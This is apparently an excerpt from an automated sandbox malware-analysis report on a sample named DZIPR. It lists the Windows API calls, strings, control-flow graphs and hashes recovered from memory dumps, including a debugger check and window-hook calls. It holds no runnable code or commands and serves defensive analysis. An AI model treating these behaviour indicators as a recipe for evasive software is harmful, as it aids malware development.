                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: H_prolog3$Exception@8Throw
                          • String ID:
                          • API String ID: 2489616738-0
                          • Opcode ID: c529eb6ab9b52fe0663edb77d35b00744b9d66cb044457ac65b6cf83565d8bde
                          • Instruction ID: ab0a33ab7eee358e488c811f51757550e895bc67e432b8b6b9160e2f89f6d61f
                          • Opcode Fuzzy Hash: c529eb6ab9b52fe0663edb77d35b00744b9d66cb044457ac65b6cf83565d8bde
                          • Instruction Fuzzy Hash: 7A019A30701672CBDB19AE668C103AD37B2AB80318F11A62CD49A8BBA0EF34DD058B10

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 259 6c5360f0-6c536139 CreateFileW 260 6c53613f-6c5367e4 259->260 261 6c5361de-6c536780 259->261 268 6c535e23-6c535e3c 260->268 269 6c535eba-6c535f0c GlobalAlloc 260->269 272 6c535e40-6c535e4e 268->272 270 6c535f12-6c535f2b 269->270 271 6c535fad 269->271 274 6c535f2f-6c535f3d 270->274 273 6c535faf-6c535fce 271->273 276 6c535ea3 272->276 277 6c535e50 272->277 288 6c535fd0 273->288 289 6c535fe7-6c535fea 273->289 278 6c535f92 274->278 279 6c535f3f 274->279 280 6c535ea5-6c535ea9 276->280 281 6c535e52-6c535e58 277->281 283 6c535f94-6c535f98 278->283 284 6c535f41-6c535f47 279->284 285 6c5367c3-6c5367d8 280->285 286 6c535eaf-6c535eb4 280->286 281->281 287 6c535e5a-6c535e5c 281->287 293 6c5367a5-6c5367be 283->293 294 6c535f9e-6c535fa3 283->294 284->284 291 6c535f49-6c535f4b 284->291 286->272 292 6c535eb6 286->292 287->276 295 6c535e5e-6c535e64 287->295 298 6c535fd2-6c535fe5 288->298 299 6c535ffe-6c536038 289->299 300 6c535fec 289->300 291->278 301 6c535f4d-6c535f53 291->301 292->269 293->273 294->274 302 6c535fa5-6c535fa9 294->302 296 6c5366aa-6c5366af 295->296 297 6c535e6a-6c535e6e 295->297 296->280 309 6c535e97-6c535ea1 296->309 297->269 298->289 298->298 306 6c5360d9 299->306 307 6c53603e-6c536057 299->307 303 6c535fee-6c535ffc 300->303 304 6c5366b4 301->304 305 6c535f59-6c535f5d 301->305 302->271 303->299 303->303 316 6c5366be 304->316 311 6c535f5f-6c535f75 305->311 310 6c5360db-6c5360ef 306->310 312 6c53605b-6c536069 307->312 309->280 310->259 311->311 313 6c535f77-6c535f84 311->313 314 6c53606b 312->314 315 6c5360be 312->315 313->283 318 6c535f86-6c535f90 313->318 319 6c53606d-6c536073 314->319 317 6c5360c0-6c5360c4 315->317 320 6c536788-6c5367a0 316->320 317->320 321 6c5360ca-6c5360cf 317->321 318->283 319->319 322 6c536075-6c536077 319->322 320->310 321->312 323 6c5360d1-6c5360d5 321->323 322->315 324 6c536079-6c53607f 322->324 323->306 324->316 325 6c536085-6c536089 324->325 326 6c53608b-6c5360a1 325->326 326->326 327 6c5360a3-6c5360b0 326->327 327->317 328 6c5360b2-6c5360bc 327->328 328->317
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6C5360F6
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: baa04df09d9cc3d853c8a2779e51a26c952c757ea6f83c99552bf59ef84ef4af
                          • Instruction ID: 5fa3f8ea8c563cb29329e091ff9bd167046e303346f9b58944b8bc9413e04a97
                          • Opcode Fuzzy Hash: baa04df09d9cc3d853c8a2779e51a26c952c757ea6f83c99552bf59ef84ef4af
                          • Instruction Fuzzy Hash: 1A019A75A087019FC718CF1AC890916BBE5BFC9304F16856DE84897326D670E855CF99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 329 6c54a6f4-6c54a716 HeapCreate 330 6c54a718-6c54a719 329->330 331 6c54a71a-6c54a723 329->331
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6C544776,00000001,?,?,?,6C5448EF,?,?,?,6C55E848,0000000C,6C5449AA), ref: 6C54A709
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: d136b9d88fbd6bf98443b55b9985daf940b613b9dd4cd2cc8e78e803d0bf6d69
                          • Instruction ID: 969106aebf9d09d6d6a3052b167814cc6dd547f8b606544d8d9842b5e114450c
                          • Opcode Fuzzy Hash: d136b9d88fbd6bf98443b55b9985daf940b613b9dd4cd2cc8e78e803d0bf6d69
                          • Instruction Fuzzy Hash: 25D05E326A43449ADB109E769C09B263BFC9385796F558436F80DC6190E570C580DA09
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6C537498
                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6C5376D5,?,00000000,?,00000000,00000104,00000000,?,6C55BEF4,00000000), ref: 6C5374D6
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6C537546
                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C53756D
                          • CharUpperW.USER32(00000000), ref: 6C5375A0
                          • FindFirstFileW.KERNEL32(?,?), ref: 6C5375BC
                          • FindClose.KERNEL32(00000000), ref: 6C5375C8
                          • lstrlenW.KERNEL32(?), ref: 6C5375E6
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                          • String ID:
                          • API String ID: 624941980-0
                          • Opcode ID: 91183b6fbb89391b3dcccd9daf03071e0aaac50daf3e0babf3584547c140b14d
                          • Instruction ID: e7b2fc7d504943a8eae33fd711a8bd0228a1f23c6f2a1bc07172f1fb58288e16
                          • Opcode Fuzzy Hash: 91183b6fbb89391b3dcccd9daf03071e0aaac50daf3e0babf3584547c140b14d
                          • Instruction Fuzzy Hash: 2E41BE70E04635DBDF149F60CD98BAE7B78AF01358F101699E81DA2991EB319E88CF20
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 6C547C6C
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C547C81
                          • UnhandledExceptionFilter.KERNEL32(6C55A4B8), ref: 6C547C8C
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6C547CA8
                          • TerminateProcess.KERNEL32(00000000), ref: 6C547CAF
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 2cf772bcaabc571770560b4b04e43604d53d5a72295cf1651bcd726206ee7f1d
                          • Instruction ID: c399813eb67e3eab326e54807fde7fcd57f95fc43f9c9b00fbc876de302cbb02
                          • Opcode Fuzzy Hash: 2cf772bcaabc571770560b4b04e43604d53d5a72295cf1651bcd726206ee7f1d
                          • Instruction Fuzzy Hash: 2821DFB4A92205DFDB40CF2FCC456697BB4BB4A309FD2411AE44897372EBB059848F49
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6C5389FC
                          • __snwprintf_s.LIBCMT ref: 6C538A2E
                          • LoadLibraryW.KERNEL32(?), ref: 6C538A69
                            • Part of subcall function 6C545348: __getptd_noexit.LIBCMT ref: 6C545348
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                          • String ID: LOC
                          • API String ID: 3175857669-519433814
                          • Opcode ID: a6701c71937155428ea6e1aa7268d47ac882d64b20a9cdd8f391258fc858fae2
                          • Instruction ID: 113dcd4705afe3c1bc6302cba6830baa411dba5cf656678d373710219e9ce281
                          • Opcode Fuzzy Hash: a6701c71937155428ea6e1aa7268d47ac882d64b20a9cdd8f391258fc858fae2
                          • Instruction Fuzzy Hash: 9C110A71A50318EBDB159BA4CC44BEE77ADEB42328F504467F118E7590EB748E08D762
                          APIs
                          • GetKeyState.USER32(00000010), ref: 6C540514
                          • GetKeyState.USER32(00000011), ref: 6C54051D
                          • GetKeyState.USER32(00000012), ref: 6C540526
                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6C54053C
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: State$MessageSend
                          • String ID:
                          • API String ID: 1440529007-0
                          • Opcode ID: 4586b18cf9daceb5c45b62b0fbd082351899149d9c51cc80f628712e977fd765
                          • Instruction ID: df23abd5ab10453f230288bdae1e8fd29f1a0c2d6328e171773bd41f1da304fc
                          • Opcode Fuzzy Hash: 4586b18cf9daceb5c45b62b0fbd082351899149d9c51cc80f628712e977fd765
                          • Instruction Fuzzy Hash: C4F0BE367912EEE6EA5422744C01FE90924CFE1B98F614467A649EA9C2CBA0CC466661
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6C538BE9
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C538EB7,?,?), ref: 6C538C19
                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C538C2D
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C538C69
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C538C77
                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C538C94
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C538CBF
                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C538CC8
                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6C538CE1
                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6C538CFE
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6C538D31
                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6C538D3A
                          • GetModuleFileNameW.KERNEL32(6C530000,?,00000105), ref: 6C538D7F
                          • _memset.LIBCMT ref: 6C538D9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                          • API String ID: 3537336938-2299501126
                          • Opcode ID: 23549ebeab13f287a116174194b60b2f69453d4c8d5aecaeb44fae873506a4bc
                          • Instruction ID: 3b03db9c49a61f86cc2ef1587fd882bad448520d88dca8f50d8ed8a122f4187a
                          • Opcode Fuzzy Hash: 23549ebeab13f287a116174194b60b2f69453d4c8d5aecaeb44fae873506a4bc
                          • Instruction Fuzzy Hash: 01517C71D11238AACB64DFA59C887ADB7B4EF98304F5005DBA44CE7280EB748E80CF55
                          APIs
                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6C53DE36,?,?,?,?,?,?,?,6C53FCC6,00000000,00000002,00000028), ref: 6C53DCF9
                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6C53DD15
                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C53DD2A
                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6C53DD3B
                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6C53DD4C
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6C53DD5D
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6C53DD6E
                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6C53DD8E
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                          • API String ID: 667068680-2451437823
                          • Opcode ID: b2ade9c3c2734b315d6de0592da3ca819df0cb3234c72b34fa8c6799fe2cc5c4
                          • Instruction ID: 844551fd2398c3ff965af531ca6a0fcc9b5ccdf2ef7bd8296cba436b9087b543
                          • Opcode Fuzzy Hash: b2ade9c3c2734b315d6de0592da3ca819df0cb3234c72b34fa8c6799fe2cc5c4
                          • Instruction Fuzzy Hash: 5E210CB1A251B1DF8B43EF6A8CD443ABBF4B68B2153666D3FD109D2B14EB7840818A15
                          APIs
                          • GetParent.USER32(?), ref: 6C53FC05
                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C53FC28
                          • GetWindowRect.USER32(?,?), ref: 6C53FC42
                          • CopyRect.USER32(?,?), ref: 6C53FCA5
                          • CopyRect.USER32(?,?), ref: 6C53FCAF
                          • GetWindowRect.USER32(00000000,?), ref: 6C53FCB8
                            • Part of subcall function 6C53DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C53DED6
                          • CopyRect.USER32(?,?), ref: 6C53FCD4
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Rect$Copy$Window$ByteCharMessageMultiParentSendWide
                          • String ID: (
                          • API String ID: 2332539329-3887548279
                          • Opcode ID: ea56d98c0c6bf2283c25461a9adc2088dd23754b909b189a206f586280496cea
                          • Instruction ID: 8539736ac5e2a941cebf6d522734967d35d3cf098c19ea09bce65a94e721550f
                          • Opcode Fuzzy Hash: ea56d98c0c6bf2283c25461a9adc2088dd23754b909b189a206f586280496cea
                          • Instruction Fuzzy Hash: F3518372A44129ABDF01CBA8CD84EEEBBB9AF88314F155255F919F3680E730E905CB54
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6C5419B8
                            • Part of subcall function 6C53C050: __EH_prolog3.LIBCMT ref: 6C53C057
                          • CallNextHookEx.USER32(?,?,?,?), ref: 6C5419F8
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          • _memset.LIBCMT ref: 6C541A51
                          • GetClassLongW.USER32(?,000000E0), ref: 6C541A85
                          • GetClassNameW.USER32(?,?,00000100), ref: 6C541B20
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C541B5D
                          • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6C541B6F
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C541B77
                          • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6C541B86
                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 6C541BA6
                          • UnhookWindowsHookEx.USER32(?), ref: 6C541BBA
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: HookProp$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_LongNameThrowUnhookWindows_memset
                          • String ID: #32768$AfxOldWndProc423
                          • API String ID: 3902210324-2141921550
                          • Opcode ID: 95c4b682cab0c836eaa9aa9b9aed8cce83d4df4d938f3456bba50bc09e4db23a
                          • Instruction ID: 4360e1bd1f79a3be6f54c14eac8d887c4bf5a8d72355985dfb8641170f2d853d
                          • Opcode Fuzzy Hash: 95c4b682cab0c836eaa9aa9b9aed8cce83d4df4d938f3456bba50bc09e4db23a
                          • Instruction Fuzzy Hash: 0B51C371541225EBCF119B61CC48BDF7BB8BF05365F514185F40E96AA0EB30CE91CBA5
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C55E928,0000000C,6C54A25A,00000000,00000000,?,6C54A5D4,00000000,00000001,00000000,?,6C54A89E,00000018,6C55E978,0000000C), ref: 6C54A131
                          • __crt_waiting_on_module_handle.LIBCMT ref: 6C54A13C
                            • Part of subcall function 6C545BCF: Sleep.KERNEL32(000003E8,00000000,?,6C54A082,KERNEL32.DLL,?,?,6C54A416,00000000,?,6C54488C,00000000,?,?,?,6C5448EF), ref: 6C545BDB
                            • Part of subcall function 6C545BCF: GetModuleHandleW.KERNEL32(00000000,?,6C54A082,KERNEL32.DLL,?,?,6C54A416,00000000,?,6C54488C,00000000,?,?,?,6C5448EF,?), ref: 6C545BE4
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C54A165
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6C54A175
                          • __lock.LIBCMT ref: 6C54A197
                          • InterlockedIncrement.KERNEL32(?), ref: 6C54A1A4
                          • __lock.LIBCMT ref: 6C54A1B8
                          • ___addlocaleref.LIBCMT ref: 6C54A1D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                          • String ID: $Vl$DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1028249917-393673013
                          • Opcode ID: 9bf86a3d511fc3f5894aad51c6eda53c7bc607ac75242a0f227362c511e16eaa
                          • Instruction ID: e7ea27a2b22943c43c5f2659918bba728074be858db68b40833ca9a74a1c667f
                          • Opcode Fuzzy Hash: 9bf86a3d511fc3f5894aad51c6eda53c7bc607ac75242a0f227362c511e16eaa
                          • Instruction Fuzzy Hash: 6D11B471801701DFD7608F79CC05B9ABBF0AF84318F50851EE49A97B90CB74A940CF65
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6C538503
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C538520
                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6C53852D
                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6C53853A
                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6C538547
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 667068680-2424895508
                          • Opcode ID: f3cc02fff111723098398127c0212525d9d5e58ed411f7fc07d7cf0cb74effa3
                          • Instruction ID: f7b7cd0888daa718507c0da680b0971e068efeb41b755cf56bd5248b8c1d2387
                          • Opcode Fuzzy Hash: f3cc02fff111723098398127c0212525d9d5e58ed411f7fc07d7cf0cb74effa3
                          • Instruction Fuzzy Hash: B71154F1A15262BFCF149F6B8C89426BFB4A64631C355153FE10DC3661FA308440CB27
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32,6C53A6B6), ref: 6C53A5AA
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C53A5CB
                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C53A5DD
                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C53A5EF
                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C53A601
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 417325364-2424895508
                          • Opcode ID: cd043e7d96c326ecf6cb1547f1464dd23247df280506232f931d4bffe801fb02
                          • Instruction ID: 91dfaa8955da8a21dd98aff6ad3a3bfe3d2b83d0fbf99938591490e198562527
                          • Opcode Fuzzy Hash: cd043e7d96c326ecf6cb1547f1464dd23247df280506232f931d4bffe801fb02
                          • Instruction Fuzzy Hash: 93F0C7F4E55235AFCF415FBB9C045257F78E70675C742491BE80593620EB748058CF5A
                          APIs
                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6C531BE9,?,?,?,?), ref: 6C531C39
                          • GetLastError.KERNEL32(?,?,?,?,?,6C531BE9,?,?,?,?), ref: 6C531C48
                          • __aullrem.LIBCMT ref: 6C531C60
                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6C531CE8
                          • _memset.LIBCMT ref: 6C531CF5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6C531BE9,?,?,?,?), ref: 6C531D07
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
